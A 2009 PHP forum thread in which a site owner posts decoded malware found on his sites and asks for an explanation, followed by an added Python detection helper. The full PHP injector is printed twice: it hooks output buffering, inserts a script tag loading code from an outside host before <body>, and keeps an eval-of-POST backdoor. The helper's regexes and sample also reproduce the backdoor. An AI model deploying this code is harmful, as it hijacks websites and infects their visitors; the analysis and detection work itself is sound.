Ravens PHP Scripts: Forums
eldorado
Involved
Joined: Sep 10, 2008
Posts: 424
Location: France, Translator

PostPosted: Fri Nov 06, 2009 5:30 pm

Good evening... I ran into a virus last Thursday and I was wondering if you guys could validate my explanation.
The code you see was decoded from base64.
http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/
I voluntarily left the two base64 strings undecoded, but it's leading to some script at http:[slash][slash]zangmusic[dot]com/images/zang-sullivanroom-22nov08pt2[dot]php, probably another iframed virus... wouldn't want to check.

Code:
if(!function_exists('jruq')){

   function jruq($s){
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0]as$v)if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
}

if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
foreach($a[0]as$v)
if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);

$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3phbmdtdXNpYy5jb20vaW1hZ2VzL3phbmctc3VsbGl2YW5yb29tLTIybm92MDhwdDIucGhwID48L3NjcmlwdD4='),'',$s);
if(stristr($s,'<body'))
$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);
elseif(strpos($s,'<a'))$s=$a.$s;return$s;}
function jruq2($a,$b,$c,$d){
global$jruq1;
$s=array();
if(function_exists($jruq1))call_user_func($jruq1,$a,$b,$c,$d);
foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='jruq')return;
elseif($a=='ob_gzhandler')break;
else
$s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();
ob_end_clean();}ob_start('jruq');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);
echo $s[$i][1];}}}$jruql=(($a=@set_error_handler('jruq2'))!='jruq2')?$a:0;
eval(base64_decode($_POST['e']));

if(!function_exists('jruq')){
function jruq($s){
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
}

if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3phbmdtdXNpYy5jb20vaW1hZ2VzL3phbmctc3VsbGl2YW5yb29tLTIybm92MDhwdDIucGhwID48L3NjcmlwdD4='),'',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);
elseif(strpos($s,'<a'))$s=$a.$s;
return$s;
}
function jruq2($a,$b,$c,$d){
global$jruq1;
$s=array();
if(function_exists($jruq1))call_user_func($jruq1,$a,$b,$c,$d);
foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='jruq')return;
elseif($a=='ob_gzhandler')break;
else$s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();
ob_end_clean();
}ob_start('jruq');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}
$jruql=(($a=@set_error_handler('jruq2'))!='jruq2')?$a:0;eval(base64_decode($_POST['e']));


My understanding of this script is that it replaces all the </body> stuff with </body>some scripts in every file it runs into. My understanding is very limited and I could use some light over here. Not only did some of my members run into this when they logged on 2 days ago, now it's my RN2.4 sites and some e107 sites.
thank you :)

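For readers trying to do what eldorado asks (find which files carry this injector and see what the encoded literal injects), here is an added Python triage helper; it is not code from the original post, nor from RavenNuke or e107. The indicator regexes, the condensed SAMPLE_INFECTED (built from the code posted above) and SAMPLE_CLEAN are this example's own constructions.

```python
import base64
import re

# Heuristics of this example, drawn from the injector posted above: a POST-driven
# eval backdoor, an error-handler hook, an output-buffer callback, base64 -> HTML.
INDICATORS = {
    "post_eval_backdoor": re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    "error_handler_hook": re.compile(r"set_error_handler\s*\(\s*['\"]\w+['\"]"),
    "output_buffer_callback": re.compile(r"ob_start\s*\(\s*['\"]\w+['\"]\s*\)"),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

def decode_html_literals(src):
    """Decode long base64 literals and keep those that become script/iframe tags."""
    payloads = []
    for m in B64_LITERAL.finditer(src):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not base64, or not text
        if re.search(r"<(script|iframe)\b", text, re.I):
            payloads.append(text)
    return payloads

def scan_php_source(src):
    """Return the sorted indicator names matched in one PHP source text."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(src)]
    if decode_html_literals(src):
        hits.append("base64_html_payload")
    return sorted(hits)

def triage(src):
    """Legit code also calls set_error_handler/ob_start; flag only the combinations."""
    hits = scan_php_source(src)
    if "post_eval_backdoor" in hits:
        return "backdoor"
    if "output_buffer_callback" in hits and "base64_html_payload" in hits:
        return "injector"
    return "clean"

# Constructed samples: a condensed copy of the posted injector, and a clean file.
SAMPLE_INFECTED = r"""<?php
function jruq($s){$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3phbmdtdXNpYy5jb20vaW1hZ2VzL3phbmctc3VsbGl2YW5yb29tLTIybm92MDhwdDIucGhwID48L3NjcmlwdD4='),'',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);return$s;}
function jruq2($a,$b,$c,$d){ob_start('jruq');}
$jruql=(($a=@set_error_handler('jruq2'))!='jruq2')?$a:0;eval(base64_decode($_POST['e']));"""
SAMPLE_CLEAN = r"""<?php ob_start('ob_gzhandler'); set_error_handler('app_error_handler');
echo '<body>' . htmlspecialchars($_POST['name'] ?? '') . '</body>';"""
```

Running `triage` over every .php file under the webroot lists the infected ones, and `decode_html_literals` shows the script tag the injector prepends to `<body>`.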
eldorado

PostPosted: Mon Nov 09, 2009 4:53 pm

*Bump* still need help...
 
Palbin
Site Admin
Joined: Mar 30, 2006
Posts: 2583
Location: Pittsburgh, Pennsylvania

PostPosted: Mon Nov 09, 2009 6:09 pm

eldorado, what exactly are you asking? Obviously it appears to be a malicious script, but how did you come across it? How did you come to be there?

If it was uploaded to your site you need to find your access logs to see how it was done. If it was uploaded to your site there is not much we can do without knowing how it was done.

evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221

PostPosted: Tue Nov 10, 2009 12:08 am

Pretty standard obfuscation - doesn't seem to do anything unless you know what is passed into
$_POST['e']

eldorado

PostPosted: Tue Nov 10, 2009 1:54 am

Palbin wrote:
eldorado, what exactly are you asking? Obviously it appears to be a malicious script, but how did you come across it? How did you come to be there?

Well, for some obscure reason, my e107 site from which the attack originated doesn't provide FTP logs. So that'd be an issue. However, the RN2.4 got "hacked" because I was infected during my stay on the e107 one. It used my saved password in FileZilla to get into my FTP. (I got rid of the trojan.)

But the question is, what exactly is it doing? I know malicious scripts should be deleted immediately, but I need to know where they are first, hence my question.
 
Palbin

PostPosted: Tue Nov 10, 2009 6:40 am

Ah. I will have to defer to evaders99 then :)
 
eldorado

PostPosted: Tue Nov 10, 2009 11:32 am

evaders99 wrote:
Pretty standard obfuscation - doesn't seem to do anything unless you know what is passed into
$_POST['e']


Ok, so basically it's just Myurl.com/thefile.php?e="somebase64", so no way to know what it does unless you know what was posted... that is pretty obscure for me :( And really annoying.
 
evaders99

PostPosted: Tue Nov 10, 2009 8:14 pm

yep pretty much
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours